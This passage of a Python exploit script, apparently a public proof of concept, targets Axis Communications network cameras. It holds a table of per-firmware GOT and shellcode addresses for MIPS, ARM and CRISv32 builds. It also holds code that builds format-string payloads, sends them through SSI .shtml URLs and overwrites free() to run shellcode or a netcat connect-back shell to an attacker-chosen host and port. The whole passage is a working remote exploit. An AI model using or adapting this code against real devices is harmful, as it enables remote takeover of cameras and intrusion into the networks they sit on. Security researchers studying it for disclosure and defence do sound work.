                          'MIPSel'      # Shellcode type
           ],

            # MPQT
             'MIPS-6.2x': [
                           0x41e578,       # Adjust to GOT free() address
                             0x41fae0,       # .bss shellcode address
                           2,              # 1st POP's
                           2,              # 2nd POP's
                           'axi',                # Aligns injected code
                             700,            # How big buffer before shellcode
                          'MIPSel'      # Shellcode type
           ],

            # MPQT
             'MIPS-6.20x': [
                          0x41d0c4,       # Adjust to GOT free() address
                             0x41e700,       # .bss shellcode address
                           3,              # 1st POP's
                           13,             # 2nd POP's
                           'axi',                # Aligns injected code
                             700,            # How big buffer before shellcode
                          'MIPSel'      # Shellcode type
           ],

            # PACS
             'MIPS-1.3x': [
                           0x41e4cc,       # Adjust to GOT free() address
                             0x420a78,       # .bss shellcode address
                           7,              # 1st POP's
                           11,             # 2nd POP's
                           'axis',               # Aligns injected code
                             700,            # How big buffer before shellcode
                          'MIPSel'      # Shellcode type
           ],

            # PACS
             'MIPS-1.1x': [
                           0x41e268,       # Adjust to GOT free() address
                             0x420818,       # .bss shellcode address
                           7,              # 1st POP's
                           11,             # 2nd POP's
                           'axis',               # Aligns injected code
                             700,            # How big buffer before shellcode
                          'MIPSel'      # Shellcode type
           ],

#
# Tested with execstack to set executable stack flag bit on bin's and lib's
#
# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working.
#

         # ARMel with bin/libs executable stack flag set with 'execstack'
         # MPQT
             'ARM-5.50x': [                        # 
                         0x1c1b4,        # Adjust to GOT free() address
                             0x1e7c8,        # .bss shellcode address
                           93,             # 1st POP's
                           1,              # 2nd POP's
                           'axis',               # Aligns injected code
                             700,            # How big buffer before shellcode
                          'ARMel'               # Shellcode type (ARMel)
           ],

            # ARMel with bin/libs executable stack flag set with 'execstack'
         # MPQT
             'ARM-5.55x': [                        # 
                         0x1c15c,        # Adjust to GOT free() address
                             0x1e834,        # .bss shellcode address
                           59,             # 1st POP's
                           80,             # 2nd POP's
                           'axis',               # Aligns injected code
                             800,            # How big buffer before shellcode
                          'ARMel'               # Shellcode type (ARMel)
           ],

#
# Using direct parameter access format string, AKA 'New Style'
#
           # MPQT
             'ARM-NCSH-5.20x': [           # AXIS P1311 5.20 (id=root)
                                0x1c1b4,        # Adjust to GOT free() address
                             0x10178,        # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
                              61,             # 1st POP's
                           115,            # 2nd POP's
                           143,            # 3rd POP's
                           118,            # 4th POP's
                           'NCSH2'               # Shellcode type (Netcat Shell)
            ],

            # MPQT
             'ARM-NCSH-5.2x': [            # 
                         0x1c1b4,        # Adjust to GOT free() address
                             0x1013c,        # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
                              61,             # 1st POP's
                           115,            # 2nd POP's
                           143,            # 3rd POP's
                           118,            # 4th POP's
                           'NCSH2'               # Shellcode type (Netcat Shell)
            ],

            # MPQT
             'ARM-NCSH-5.4x': [            # 
                         0x1c1b4,        # Adjust to GOT free() address
                             0x101fc,        # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
                              61,             # 1st POP's
                           115,            # 2nd POP's
                           143,            # 3rd POP's
                           118,            # 4th POP's
                           'NCSH2'               # Shellcode type (Netcat Shell)
            ],
#
# Using POP format string, AKA 'Old Style'
#

               # MPQT
             'ARM-NCSH-5.5x': [            # 
                         0x1c15c,        # Adjust to GOT free() address
                             0xfdcc,         # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
                              97,             # 1st POP's
                           0,              # 2nd POP's
                           41,             # 3rd POP's
                           0,              # 4th POP's
                           'NCSH1'               # Shellcode type (Netcat Shell)
            ],

            # MPQT
             'ARM-NCSH-5.6x': [            # 
                         0x1c15c,        # Adjust to GOT free() address
                             0xfcec,         # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
                              97,             # 1st POP's
                           0,              # 2nd POP's
                           41,             # 3rd POP's
                           0,              # 4th POP's
                           'NCSH1'               # Shellcode type (Netcat Shell)
            ],

            # MPQT
             'ARM-NCSH-5.7x': [            # 
                         0x1c1c0,        # Adjust to GOT free() address
                             0xf800,         # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
                              132,            # 1st POP's
                           0,              # 2nd POP's
                           34,             # 3rd POP's
                           0,              # 4th POP's
                           'NCSH1'               # Shellcode type (Netcat Shell)
            ],

            # Will go in endless loop after exit of nc shell... DoS sux
                # MPQT
             'ARM-NCSH-5.8x': [            # 
                         0x1b39c,        # Adjust to GOT free() address
                             0xf8c0,         # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
                              98,             # 1st POP's
                           0,              # 2nd POP's
                           34,             # 3rd POP's
                           1,              # 4th POP's
                           'NCSH1'               # Shellcode type (Netcat Shell)
            ],

            # MPQT
             'ARM-NCSH-6.1x': [            # 
                         0x1d2a4,        # Adjust to GOT free() address
#                            0xecc4,         # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
                              0xecc8,         # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
                              106,            # 1st POP's
                           0,              # 2nd POP's
                           34,             # 3rd POP's
                           1,              # 4th POP's
                           'NCSH1'               # Shellcode type (Netcat Shell)
            ],
#
# Using POP format string, AKA 'Old Style'
#

               # MPQT
             'CRISv32-5.5x': [             # 
                         0x8d148,        # Adjust to GOT free() address
                             0x8f5a8,        # .bss shellcode address
                           4,              # 1st POP's
                           13,             # 2nd POP's
                           'axis',               # Aligns injected code
                             470,            # How big buffer before shellcode
                          'CRISv32'     # Shellcode type (Crisv32)
         ],

            # MPQT
             'CRISv32-5.4x': [             # 
                         0x8d0e0,        # Adjust to GOT free() address
                             0x8f542,        # .bss shellcode address
                           4,              # 1st POP's
                           13,             # 2nd POP's
                           'axis',               # Aligns injected code
                             470,            # How big buffer before shellcode
                          'CRISv32'     # Shellcode type (Crisv32)
         ],

            # MPQT
             'CRISv32-5.2x': [             # 
                         0x8d0b4,        # Adjust to GOT free() address
                             0x8f4d6,        # .bss shellcode address
                           4,              # 1st POP's
                           13,             # 2nd POP's
                           'axis',               # Aligns injected code
                             470,            # How big buffer before shellcode
                          'CRISv32'     # Shellcode type (Crisv32)
         ],

            # MPQT
             'CRISv32-5.20.0': [           # 
                         0x8d0e4,        # Adjust to GOT free() address
                             0x8f546,        # .bss shellcode address
                           4,              # 1st POP's
                           13,             # 2nd POP's
                           'axis',               # Aligns injected code
                             470,            # How big buffer before shellcode
                          'CRISv32'     # Shellcode type (Crisv32)
         ]


        }

             if self.target == 0:
                       return target_db
                   
           if not self.target in target_db:
                   print "[!] Unknown FMS key: %s!" % self.target
                   sys.exit(1)
        
           if self.verbose:
                   print "[Verbose] Number of availible FMS keys:",len(target_db)

              return target_db


#
# Validate correctness of HOST, IP and PORT
#
class Validate:

    def __init__(self,verbose):
                self.verbose = verbose

        # Check if IP is valid
     def CheckIP(self,IP):
              self.IP = IP

          ip = self.IP.split('.')
          if len(ip) != 4:
                   return False
               for tmp in ip:
                     if not tmp.isdigit():
                              return False
               i = int(tmp)
               if i < 0 or i > 255:
                     return False
               return True

   # Check if PORT is valid
   def Port(self,PORT):
               self.PORT = PORT

              if int(self.PORT) < 1 or int(self.PORT) > 65535:
                 return False
               else:
                      return True

   # Check if HOST is valid
   def Host(self,HOST):
               self.HOST = HOST

              try:
                       # Check valid IP
                   socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP
                     # Or we check again if it is correct typed IP
                      if self.CheckIP(self.HOST):
                                return self.HOST
                   else:
                              return False
               except socket.error as e:
                  # Else check valid DNS name, and use the IP address
                        try:
                               self.HOST = socket.gethostbyname(self.HOST)
                                return self.HOST
                   except socket.error as e:
                          return False



if __name__ == '__main__':

#
# Help, info and pre-defined values
#   
   INFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis <mcw noemail eu>]'
   HTTP = "http"
    HTTPS = "https"
  proto = HTTP
       verbose = False
    noexploit = False
  lhost = '192.168.0.1' # Default Local HOST
       lport = '31337'               # Default Local PORT
       rhost = '192.168.0.90'        # Default Remote HOST
      rport = '80'          # Default Remote PORT
      #  Not needed for the SSI exploit, here for possible future usage.
#        creds = 'root:pass'
      creds = False

#
# Try to parse all arguments
#
    try:
               arg_parser = argparse.ArgumentParser(
#             prog=sys.argv[0],
          prog='axis-ssid-PoC.py',
                description=('[*]' + INFO + '\n'))
              arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
            arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
              arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')
             arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')
         arg_parser.add_argument('--fms', required=False, help='Manual FMS key')
                if creds:
                  arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')
               arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
               arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
                arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')
              arg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose')
            args = arg_parser.parse_args()
     except Exception as e:
             print INFO,"\nError: %s\n" % str(e)
              sys.exit(1)

   # We want at least one argument, so print out help
 if len(sys.argv) == 1:
             arg_parser.parse_args(['-h'])

       print "\n[*]",INFO

  if args.verbose:
           verbose = args.verbose

        # Print out info from dictionary
   if args.dict:
              target = FMSdb(rhost,verbose).FMSkey(0)
            print "[db] Number of FMS keys:",len(target)

                # Print out detailed info from dictionary
          if verbose:

                   print "[db] Target details of FMS Keys availible for manual xploiting"
                   print "\n[FMS Key]\t[GOT Address]\t[BinSh Address]\t[POP1]\t[POP2]\t[POP3]\t[POP4]\t[Shellcode]"

                    for tmp in range(0,len(target)):
                           Key = sorted(target.keys())[tmp]
                           temp = re.split('[-]',Key)[0:10]

                            if temp[1] == 'NCSH':
                                    print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',target[Key][4],'\t',target[Key][5],'\t',target[Key][6]

                 print "\n[FMS Key]\t[GOT Address]\t[BSS Address]\t[POP1]\t[POP2]\t[Align]\t[Buf]\t[Shellcode]"
                   for tmp in range(0,len(target)):
                           Key = sorted(target.keys())[tmp]
                           temp = re.split('[-]',Key)[0:10]

                            if temp[1] != 'NCSH':
                                    print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',len(target[Key][4]),'\t',target[Key][5],'\t',target[Key][6]

                    print "\n"
               else:
                      print "[db] Target FMS Keys availible for manual xploiting instead of using auto mode:"
                  Key = ""
                 for tmp in range(0,len(target)):
                           Key += sorted(target.keys())[tmp]
                          Key += ', '
                      print '\n',Key,'\n'
            sys.exit(0)

#
# Check validity, update if needed, of provided options
#
   if args.https:
             proto = HTTPS
              if not args.rport:
                 rport = '443'

       if creds and args.auth:
            creds = args.auth

     if args.noexploit:
         noexploit = args.noexploit

    if args.rport:
             rport = args.rport

    if args.rhost:
             rhost = args.rhost

    if args.lport:
             lport = args.lport

    if args.lhost:
             lhost = args.lhost

    # Check if LPORT is valid
  if not Validate(verbose).Port(lport):
              print "[!] Invalid LPORT - Choose between 1 and 65535"
           sys.exit(1)

   # Check if RPORT is valid
  if not Validate(verbose).Port(rport):
              print "[!] Invalid RPORT - Choose between 1 and 65535"
           sys.exit(1)

   # Check if LHOST is valid IP or FQDN, get IP back
  lhost = Validate(verbose).Host(lhost)
      if not lhost:
              print "[!] Invalid LHOST"
                sys.exit(1)

   # Check if RHOST is valid IP or FQDN, get IP back
  rhost = Validate(verbose).Host(rhost)
      if not rhost:
              print "[!] Invalid RHOST"
                sys.exit(1)


#
# Validation done, start print out stuff to the user
#
 if noexploit:
              print "[i] Test mode selected, no exploiting..."
 if args.https:
             print "[i] HTTPS / SSL Mode Selected"
    print "[i] Remote target IP:",rhost
      print "[i] Remote target PORT:",rport
    print "[i] Connect back IP:",lhost
       print "[i] Connect back PORT:",lport

        rhost = rhost + ':' + rport

#
# FMS key is required into this PoC
#
     if not args.fms:
           print "[!] FMS key is required!"
         sys.exit(1)
        else:
              Key = args.fms
             print "[i] Trying with FMS key:",Key

#
# Prepare exploiting
#
   # Look up the FMS key in dictionary and return pointer for FMS details to use
      target = FMSdb(rhost,verbose).FMSkey(Key)

     if target[Key][6] == 'NCSH1':
            NCSH1 = target[Key][6]
             NCSH2 = ""
       elif target[Key][6] == 'NCSH2':
          NCSH2 = target[Key][6]
             NCSH1 = ""
       else:
              NCSH1 = ""
               NCSH2 = ""
       
   if Key == 'ARM-NCSH-5.8x':
               print "\nExploit working, but will end up in endless loop after exiting remote NCSH\nDoS sux, so I'm exiting before that shit....\n\n"
              sys.exit(0)

   print "[i] Preparing shellcode:",str(target[Key][6])

        # We don't use url encoded shellcode with Netcat shell
        # This is for MIPS/CRISv32 and ARM shellcode
       if not NCSH1 and not NCSH2:
                FMSdata = target[Key][4]                # This entry aligns the injected shellcode

            # Building up the url encoded shellcode for sending to the target,
         # and replacing LHOST / LPORT in shellcode to choosen values
               
           # part of first 500 decoded bytes will be overwritten during stage #2, and since
           # there is different 'tailing' on the request internally, keep it little more than needed, to be safe.
           # Let it be 0x00, just for fun.
            FMSdata += '%00' * target[Key][5]

           # Connect back IP to url encoded
           ip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.')))
         ip_hex = ip_hex.split()
            IP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3];

              # Let's break apart the hex code of LPORT into two bytes
              port_hex = hex(int(lport))[2:]
             port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)
               port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))
                port_hex = port_hex.split()
        
           if (target[Key][6]) == 'MIPSel':
                 # Connect back PORT
                        if len(port_hex) == 1:
                             PP1 = "%ff"
                              PP0 = '%{:02x}'.format((int(port_hex[0],16)-1))
                  elif len(port_hex) == 2:
                           # Little Endian
                            PP1 = '%{:02x}'.format((int(port_hex[0],16)-1))
                          PP0 = '%{:02x}'.format(int(port_hex[1],16))
              elif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32
                      # Connect back PORT
                        if len(port_hex) == 1:
                             PP1 = "%00"
                              PP0 = '%{:02x}'.format(int(port_hex[0],16))
                      elif len(port_hex) == 2:
                           # Little Endian
                            PP1 = '%{:02x}'.format(int(port_hex[0],16))
                              PP0 = '%{:02x}'.format(int(port_hex[1],16))
              elif (target[Key][6]) == 'CRISv32':
                      # Connect back PORT
                        if len(port_hex) == 1:
                             PP1 = "%00"
                              PP0 = '%{:02x}'.format(int(port_hex[0],16))
                      elif len(port_hex) == 2:
                           # Little Endian
                            PP1 = '%{:02x}'.format(int(port_hex[0],16))
                              PP0 = '%{:02x}'.format(int(port_hex[1],16))
              else:
                      print "[!] Unknown shellcode! (%s)" % str(target[Key][6])
                        sys.exit(1)

           # Replace LHOST / LPORT in URL encoded shellcode
           shell = shellcode_db(rhost,verbose).sc(target[Key][6])
             shell = shell.replace("IP1",IP1)
         shell = shell.replace("IP2",IP2)
         shell = shell.replace("IP3",IP3)
         shell = shell.replace("IP4",IP4)
         shell = shell.replace("PP0",PP0)
         shell = shell.replace("PP1",PP1)
         FMSdata += shell

#
# Calculate the FMS values to be used
#
        # Get pre-defined values
   ALREADY_WRITTEN = 40    # Already 'written' in the daemon before our FMS
#        POP_SIZE = 8
       POP_SIZE = 1

  GOThex = target[Key][0]
    BSShex = target[Key][1]
    GOTint = int(GOThex)

  # 'One-Write-Where-And-What'
     if not NCSH1 and not NCSH2:

           POP1 = target[Key][2]
              POP2 = target[Key][3]

         # Calculate for creating the FMS code
              ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)
              GOTint = (GOTint - ALREADY_WRITTEN)
        
           ALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE)

         BSSint = int(BSShex)
               BSSint = (BSSint - GOTint - ALREADY_WRITTEN)

#         if verbose:
#                       print "[Verbose] Calculated GOTint:",GOTint,"Calculated BSSint:",BSSint

   # 'Two-Write-Where-And-What' using "New Style"
 elif NCSH2:

           POP1 = target[Key][2]
              POP2 = target[Key][3]
              POP3 = target[Key][4]
              POP4 = target[Key][5]
              POP2_SIZE = 2
              
           # We need to count higher than provided address for the jump
               BaseAddr = 0x10000 + BSShex
        
           # Calculate for creating the FMS code
              GOTint = (GOTint - ALREADY_WRITTEN)

           ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint
         
           # Calculate FirstWhat value
                FirstWhat = BaseAddr - (ALREADY_WRITTEN)
           
           ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat

         # Calculate SecondWhat value, so it always is 0x20300
              SecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE)

          shell = shellcode_db(rhost,verbose).sc(target[Key][6])
             shell = shell.replace("LHOST",lhost)
             shell = shell.replace("LPORT",lport)

                FirstWhat = FirstWhat - len(shell)

#           if verbose:
#                       print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat
    
   
   # 'Two-Write-Where-And-What' using "Old Style"
 elif NCSH1:

           POP1 = target[Key][2]
              POP2 = target[Key][3]
              POP3 = target[Key][4]
              POP4 = target[Key][5]
              POP2_SIZE = 2

         # FirstWhat writes with 4 bytes (Y) (0x0002YYYY)
           # SecondWhat writes with 1 byte (Z) (0x00ZZYYYY)
           if BSShex > 0x10000:
                  MSB = 1
            else:
                      MSB = 0

               # We need to count higher than provided address for the jump
               BaseAddr = 0x10000 + BSShex

           # Calculate for creating the FMS code
              ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)
              
           GOTint = (GOTint - ALREADY_WRITTEN)
                
           ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE)
         
           # Calculate FirstWhat value
                FirstWhat = BaseAddr - (ALREADY_WRITTEN)
           
           ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE)

             # Calculate SecondWhat value, so it always is 0x203[00] or [01]
            SecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB

                shell = shellcode_db(rhost,verbose).sc(target[Key][6])
             shell = shell.replace("LHOST",lhost)
             shell = shell.replace("LPORT",lport)

                GOTint = GOTint - len(shell)

#         if verbose:
#                       print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat
    
   else:
              print "[!] NCSH missing, exiting"
                sys.exit(1)
#
# Let's start the exploiting procedure
#

#
# Stage one
#
   if NCSH1 or NCSH2:

            # "New Style" needs to make the exploit in two stages
            if NCSH2:
                  FMScode = do_FMS(rhost,verbose)
                    # Writing 'FirstWhere' and 'SecondWhere'
                       # 1st request
                      FMScode.AddADDR(GOTint) # Run up to free() GOT address
                     #
                  # 1st and 2nd "Write-Where"
                      FMScode.AddDirectParameterN(POP1)       # Write 1st Where
                  FMScode.Add("XX")                     # Jump up two bytes for next address
                       FMScode.AddDirectParameterN(POP2)       # Write 2nd Where
                  FMSdata = FMScode.FMSbuild()
               else:
                      FMSdata = ""

                print "[>] StG_1: Preparing netcat connect back shell to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata))
      else:
              print "[>] StG_1: Sending and decoding shellcode to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata))

      # Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM
   # Actually, any valid and public readable .shtml file will work...
 # (One of the two below seems always to be usable)
 #
  # For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two
   # For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url
       #
  try:
               target_url = "/httpDisabled.shtml?user_agent="
           if noexploit:
                      target_url2 = target_url
           else:
                      target_url2 = "/httpDisabled.shtml?&http_user="

                if NCSH2:
                  html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
          else:
                      html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)
 except urllib2.HTTPError as e:
             if e.code == 404:
                  print "[<] Error",e.code,e.reason
                   target_url = "/view/viewer_index.shtml?user_agent="
                      if noexploit:
                              target_url2 = target_url
                   else:
                              target_url2 = "/view/viewer_index.shtml?&http_user="
                        print "[>] Using alternative target shtml"
                  if NCSH2:
                          html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
                  else:
                              html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)
 except Exception as e:
             if not NCSH2:
                      print "[!] Shellcode delivery failed:",str(e)
                    sys.exit(1)
#
# Stage two
#

#
# Building and sending the FMS code to the target
#
     print "[i] Building the FMS code..."

        FMScode = do_FMS(rhost,verbose)

       # This is an 'One-Write-Where-And-What' for FMS
  #
  # Stack Example:
   #
  # Stack content |       Stack address (ASLR)
       #
  # 0x0           |       @0x7e818dbc -> [POP1's]
  # 0x0           |       @0x7e818dc0 -> [free () GOT address]
  # 0x7e818dd0    |       @0x7e818dc4>>>>>+ "Write-Where" (%n)
    # 0x76f41fb8    |       @0x7e818dc8     | -> [POP2's]
    # 0x76f3d70c    |       @0x7e818dcc     | -> [BSS shell code address]
 # 0x76f55ab8    |       @0x7e818dd0<<<<<+ "Write-What" (%n)
     # 0x1           |       @0x7e818dd4
        #
  if not NCSH1 and not NCSH2:
                FMScode.AddPOP(POP1)            # 1st serie of 'Old Style' POP's 
           FMScode.AddADDR(GOTint)         # GOT Address
              FMScode.AddWRITEn(1)            # 4 bytes Write-Where
#             FMScode.AddWRITElln(1)          # Easier to locate while debugging as this will write double word (0x00000000004xxxxx)

                FMScode.AddPOP(POP2)            # 2nd serie of 'Old Style' POP's
            FMScode.AddADDR(BSSint)         # BSS shellcode address
            FMScode.AddWRITEn(1)            # 4 bytes Write-What
#              FMScode.AddWRITElln(1)          # Easier to locate while debugging as this will write double word (0x00000000004xxxxx)

        # End of 'One-Write-Where-And-What'


    # This is an 'Two-Write-Where-And-What' for FMS
  #
  # Netcat shell and FMS code in same request, we will jump to the SSI function <!--#exec cmd="xxx" -->
  # We jump over all SSI tagging to end up directly where "xxx" will
       # be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv())
       #
  # The Trick here is to write lower target address, that we will jump to when calling free(),
       # than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT
  # address with two LSB writes.
     #
  elif NCSH2:
                #
          # Direct parameter access for FMS exploitation are really nice and easy to use.
            # However, we need to exploit in two stages with two requests.
             # (I was trying to avoid this "Two-Stages" so much as possibly in this exploit developement...)
          #
          # 1. Write "Two-Write-Where", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB)
            # 2. Write with "Two-Write-What", where 1st (LSB) and 2nd (MSB) "Write-Where" pointing to.
             # 
         # With "new style", we can write with POPs independently as we don't depended of same criteria as in "NCSH1",
             # we can use any regular "Stack-to-Stack" pointer as we can freely choose the POP-and-Write.
             # [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.]
              #
          # Stack Example:
           #
          # Stack content |       Stack address (ASLR)
               #
          # 0x7e818dd0    |       @0x7e818dc4>>>>>+ 1st "Write-Where" [@Stage One]
                # 0x76f41fb8    |       @0x7e818dc8     |
          # 0x76f3d70c    |       @0x7e818dcc     |
          # 0x76f55ab8    |       @0x7e818dd0<<<<<+ 1st "Write-What" [@Stage Two]
         # 0x1           |       @0x7e818dd4
                # [....]
           # 0x1c154       |       @0x7e818e10
                # 0x7e818e20    |       @0x7e818e14>>>>>+ 2nd "Write-Where" [@Stage One]
                # 0x76f41fb8    |       @0x7e818e18     |
          # 0x76f3d70c    |       @0x7e818e1c     |
          # 0x76f55758    |       @0x7e818e20<<<<<+ 2nd "Write-What" [@Stage Two]
         # 0x1           |       @0x7e818e24
                #

             FMScode.Add(shell)

            #
          # 1st and 2nd "Write-Where" already done in stage one
            #
          # 1st and 2nd "Write-What"
               #
          FMScode.AddADDR(GOTint + FirstWhat)     # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.
          FMScode.AddDirectParameterN(POP3)       # Write with 4 bytes (we want to zero out in MSB)
          FMScode.AddADDR(SecondWhat + 3)         # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)
           FMScode.AddDirectParameterHHN(POP4)     # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation

   elif NCSH1:
                # Could use direct argument addressing here, but I like to keep "old style" as well,
             # as it's another interesting concept.
                #
          # Two matching stack contents -> stack address in row w/o or max two POP's between,
              # is needed to write two bytes higher (MSB).
               # 
         #
          # Stack Example:
           #
          # Stack Content |       @Stack Address (ASLR)
              #
          # 0x9c          |       @7ef2fde8 -> [POP1's]
            # [....]
           # 0x1           |       @7ef2fdec -> [GOTint address]
         #------
            # 0x7ef2fe84    |       @7ef2fdf0 >>>>>+     Write 'FirstWhere' (%n) [LSB]
              #                       -> 'XX'        |     two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer)
              # 0x7ef2fe8c    |       @7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB]
         # ------                               |   |
               # [....]                -> [POP3's]    |   |
             # 0x7fb99dc     |       @7ef2fe7c      |   |
               # 0x7ef2fe84    |       @7ef2fe80      |   | [Count up to 0x2XXXX]
         # 0x7ef2ff6a    |       @7ef2fe84 <<<<<+   | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX))
              #                       -> [POP4's]        |
             # (nil)         |       @7ef2fe88          | [Count up to 0x20300]
         # 0x7ef2ff74    |       @7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX)

             FMScode.Add(shell)

            # Write FirstWhere for 'FirstWhat'
               FMScode.AddPOP(POP1)
               FMScode.AddADDR(GOTint) # Run up to free() GOT address
             FMScode.AddWRITEn(1)

          # Write SecondWhere for 'SecondWhat'
             #
          # This is special POP with 1 byte, we can maximum POP 2!
           #
          # This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement
              # for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes.
           # Kept as reference as we now using direct parameter access AKA 'New Style" for 5.2x/5.4x
                #
          if POP2 != 0:
                      # We only want to write 'SecondWhat' two bytes higher at free() GOT
                      if POP2 > 2:
                          print "POP2 can't be greater than two!"
                             sys.exit(1)
                        if POP2 == 1:
                              FMScode.Add("%2c")
                       else:
                              FMScode.Add("%1c%1c")
            else:
                      FMScode.Add("XX")
                FMScode.AddWRITEn(1)

          # Write FirstWhat pointed by FirstWhere
            FMScode.AddPOP(POP3)            # Old Style POP's
             FMScode.AddADDR(FirstWhat)      # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.
          FMScode.AddWRITEn(1)            # Write with 4 bytes (we want to zero out in MSB)
          
           # Write SecondWhat pointed by SecondWhere
          FMScode.AddPOP(POP4)            # Old Style POP's
             FMScode.AddADDR(SecondWhat)     # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)
           FMScode.AddWRITEhhn(1)          # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation

   else:
              sys.exit(1)

   FMSdata = FMScode.FMSbuild()

  print "[>] StG_2: Writing shellcode address to free() GOT address:",'0x{:08x}'.format(GOThex),"(%d bytes)" % (len(FMSdata))

        # FMS comes here, and calculations start after '=' in the url
    try:
               if NCSH1 or NCSH2:
                 html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
          else:
                      html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode
  except urllib2.HTTPError as e:
             print "[!] Payload delivery failed:",str(e)
              sys.exit(1)
        except Exception as e:
             # 1st string returned by HTTP mode, 2nd by HTTPS mode
              if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
                   print "[i] Timeout! Payload delivered sucessfully!"
              else:
                      print "[!] Payload delivery failed:",str(e)
                      sys.exit(1)

   if noexploit:
              print "\n[*] Not exploiting, no shell...\n"
      else:
              print "\n[*] All done, enjoy the shell...\n"

#
# [EOF]
#






Copyright © 1995-2018 LinuxRocket.net. All rights reserved.